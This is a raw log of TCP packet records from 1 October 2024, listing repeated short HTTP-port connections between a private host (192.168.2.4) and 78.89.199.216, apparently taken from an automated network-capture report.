Oct 1, 2024 15:17:27.037246943 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:27.042004108 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:27.042140007 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:28.205945015 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:28.206371069 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:28.206437111 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:28.206469059 CEST	49740	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:28.209345102 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:28.211194992 CEST	80	49740	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:28.214118004 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:28.214200974 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:28.214375019 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:28.214417934 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:28.219299078 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:28.219320059 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:29.341069937 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:29.341820002 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:29.341890097 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:29.341963053 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:29.344996929 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:29.346779108 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:29.349792004 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:29.349864006 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:29.350001097 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:29.350030899 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:29.354773998 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:29.354932070 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:30.500327110 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:30.500355959 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:30.500448942 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:30.500621080 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:30.502921104 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:30.505605936 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:30.507860899 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:30.507916927 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:30.508013010 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:30.508030891 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:30.512811899 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:30.513195992 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:31.641361952 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:31.641386986 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:31.641582012 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:31.658416033 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:31.663273096 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:31.778784990 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:31.783729076 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:31.783812046 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:31.786107063 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:31.786122084 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:31.790925026 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:31.790946960 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:33.261308908 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:33.261320114 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:33.261329889 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:33.261368990 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:33.261389971 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:33.261410952 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:33.261590004 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:33.264512062 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:33.266448975 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:33.269424915 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:33.269500017 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:33.269844055 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:33.269926071 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:33.274668932 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:33.274729013 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:34.418441057 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:34.418560028 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:34.418617010 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:34.418803930 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:34.422225952 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:34.423909903 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:34.427135944 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:34.427232981 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:34.427390099 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:34.427407026 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:34.432135105 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:34.432323933 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:35.545464039 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:35.545540094 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:35.545595884 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:35.545723915 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:35.548285961 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:35.551460028 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:35.553772926 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:35.553854942 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:35.553958893 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:35.553971052 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:35.558896065 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:35.559071064 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:36.688323021 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:36.688472033 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:36.688527107 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:36.688553095 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:36.691919088 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:36.693517923 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:36.696840048 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:36.696912050 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:36.697046995 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:36.697081089 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:36.701819897 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:36.702012062 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:37.858297110 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:37.858382940 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:37.858453989 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:37.858622074 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:37.863507986 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:37.865519047 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:37.870429039 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:37.870507956 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:37.871206045 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:37.871223927 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:37.876038074 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:37.876373053 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:38.979603052 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:38.979806900 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:38.979866028 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:38.979918957 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:38.983025074 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:38.984728098 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:38.987787962 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:38.987854004 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:38.987994909 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:38.988075972 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:38.992887974 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:38.992897987 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:40.096661091 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:40.096705914 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:40.096822977 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:40.097040892 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:40.099662066 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:40.101785898 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:40.104496002 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:40.104585886 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:40.104718924 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:40.104804993 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:40.109496117 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:40.109678984 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:41.358256102 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:41.358282089 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:41.358376026 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:41.366945028 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:41.371722937 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:41.417382002 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:41.422343016 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:41.422415018 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:41.422532082 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:41.422544956 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:41.427268028 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:41.427480936 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:42.684295893 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:42.684406042 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:42.684416056 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:42.684467077 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:42.684706926 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:42.687062025 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:42.689654112 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:42.692214966 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:42.692286968 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:42.692390919 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:42.692410946 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:42.697213888 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:42.697525024 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:43.812161922 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:43.812191963 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:43.812303066 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:43.820204973 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:43.825107098 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:43.888565063 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:43.893436909 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:43.893548965 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:43.896550894 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:43.896550894 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:43.901350975 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:43.901473045 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:45.121233940 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:45.121669054 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:45.121736050 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:45.121788979 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:45.124097109 CEST	49755	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:45.126543045 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:45.128951073 CEST	80	49755	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:45.129025936 CEST	49755	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:45.129367113 CEST	49755	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:45.129425049 CEST	49755	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:45.134155035 CEST	80	49755	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:45.134823084 CEST	80	49755	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:46.344868898 CEST	80	49755	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:46.345072985 CEST	80	49755	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:46.345238924 CEST	49755	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:46.345238924 CEST	49755	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:46.347575903 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:46.350127935 CEST	80	49755	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:46.352461100 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:46.352650881 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:46.352650881 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:46.352679968 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:46.357676029 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:46.357688904 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:47.480715036 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:47.480879068 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:47.480933905 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:47.480973959 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:47.483319044 CEST	49757	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:47.485948086 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:47.488255978 CEST	80	49757	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:47.488336086 CEST	49757	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:47.488466978 CEST	49757	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:47.488495111 CEST	49757	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:47.493324041 CEST	80	49757	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:47.493349075 CEST	80	49757	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:48.777230024 CEST	80	49757	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:48.777518988 CEST	80	49757	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:48.777574062 CEST	49757	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:48.777616024 CEST	49757	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:48.780261040 CEST	49758	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:48.782406092 CEST	80	49757	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:48.785130978 CEST	80	49758	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:48.785193920 CEST	49758	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:48.785304070 CEST	49758	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:48.785329103 CEST	49758	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:48.790330887 CEST	80	49758	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:48.790409088 CEST	80	49758	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:49.901345015 CEST	80	49758	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:49.901447058 CEST	80	49758	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:49.901493073 CEST	49758	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:49.901624918 CEST	49758	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:49.904613018 CEST	49759	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:49.906589985 CEST	80	49758	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:49.909699917 CEST	80	49759	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:49.909775972 CEST	49759	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:49.909883022 CEST	49759	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:49.909920931 CEST	49759	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:49.915008068 CEST	80	49759	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:49.915020943 CEST	80	49759	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:50.981254101 CEST	80	49759	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:50.981889009 CEST	80	49759	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:50.981956005 CEST	49759	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:50.987478971 CEST	49759	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:50.992578983 CEST	49760	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:50.992608070 CEST	80	49759	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:50.997589111 CEST	80	49760	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:50.997786999 CEST	49760	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:50.997971058 CEST	49760	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:50.998014927 CEST	49760	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:51.004055023 CEST	80	49760	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:51.004077911 CEST	80	49760	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:52.350409031 CEST	80	49760	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:52.350739956 CEST	80	49760	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:52.350953102 CEST	49760	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:52.350953102 CEST	49760	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:52.355844975 CEST	80	49760	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:52.359483004 CEST	49761	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:52.366018057 CEST	80	49761	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:52.366118908 CEST	49761	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:52.366202116 CEST	49761	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:52.366219044 CEST	49761	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:52.371038914 CEST	80	49761	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:52.371251106 CEST	80	49761	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:53.596154928 CEST	80	49761	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:53.596175909 CEST	80	49761	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:53.596198082 CEST	80	49761	78.89.199.216	192.168.2.4
Oct 1, 2024 15:17:53.596375942 CEST	49761	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:53.596375942 CEST	49761	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:53.596487045 CEST	49761	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:17:53.601316929 CEST	80	49761	78.89.199.216	192.168.2.4
Oct 1, 2024 15:18:58.629405975 CEST	49763	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:18:58.635195017 CEST	80	49763	78.89.199.216	192.168.2.4
Oct 1, 2024 15:18:58.635305882 CEST	49763	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:18:58.635438919 CEST	49763	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:18:58.635438919 CEST	49763	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:18:58.641263962 CEST	80	49763	78.89.199.216	192.168.2.4
Oct 1, 2024 15:18:58.641503096 CEST	80	49763	78.89.199.216	192.168.2.4
Oct 1, 2024 15:18:59.724081039 CEST	80	49763	78.89.199.216	192.168.2.4
Oct 1, 2024 15:18:59.724400997 CEST	80	49763	78.89.199.216	192.168.2.4
Oct 1, 2024 15:18:59.724565983 CEST	49763	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:18:59.779752016 CEST	49763	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:18:59.784720898 CEST	80	49763	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:04.967317104 CEST	49764	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:04.972249031 CEST	80	49764	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:04.972321033 CEST	49764	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:04.972449064 CEST	49764	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:04.972641945 CEST	49764	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:04.977195978 CEST	80	49764	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:04.977406025 CEST	80	49764	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:06.035068989 CEST	80	49764	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:06.035087109 CEST	80	49764	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:06.035186052 CEST	49764	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:06.035440922 CEST	49764	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:06.041214943 CEST	80	49764	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:10.689902067 CEST	49765	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:10.695034981 CEST	80	49765	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:10.695131063 CEST	49765	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:10.695298910 CEST	49765	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:10.695326090 CEST	49765	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:10.700165987 CEST	80	49765	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:10.700203896 CEST	80	49765	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:11.806364059 CEST	80	49765	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:11.806560040 CEST	80	49765	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:11.806617975 CEST	49765	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:11.806667089 CEST	49765	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:11.811470032 CEST	80	49765	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:16.791208982 CEST	49766	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:16.951153994 CEST	80	49766	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:16.951252937 CEST	49766	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:16.951466084 CEST	49766	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:16.951493979 CEST	49766	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:16.956299067 CEST	80	49766	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:16.956341982 CEST	80	49766	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:18.036545992 CEST	80	49766	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:18.036652088 CEST	80	49766	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:18.036708117 CEST	49766	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:18.037094116 CEST	49766	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:18.041821003 CEST	80	49766	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:22.185187101 CEST	49767	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:22.190233946 CEST	80	49767	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:22.190331936 CEST	49767	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:22.190469027 CEST	49767	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:22.190493107 CEST	49767	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:22.195411921 CEST	80	49767	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:22.195444107 CEST	80	49767	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:23.665653944 CEST	80	49767	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:23.665702105 CEST	80	49767	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:23.665713072 CEST	80	49767	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:23.665740013 CEST	80	49767	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:23.665760994 CEST	49767	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:23.665800095 CEST	49767	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:23.665956974 CEST	49767	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:23.671545029 CEST	80	49767	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:28.838094950 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:28.939483881 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 1, 2024 15:19:28.939600945 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 1, 2024 15:19:28.939738989 CEST	49768	80	192.168.2.4	78.89.199.216
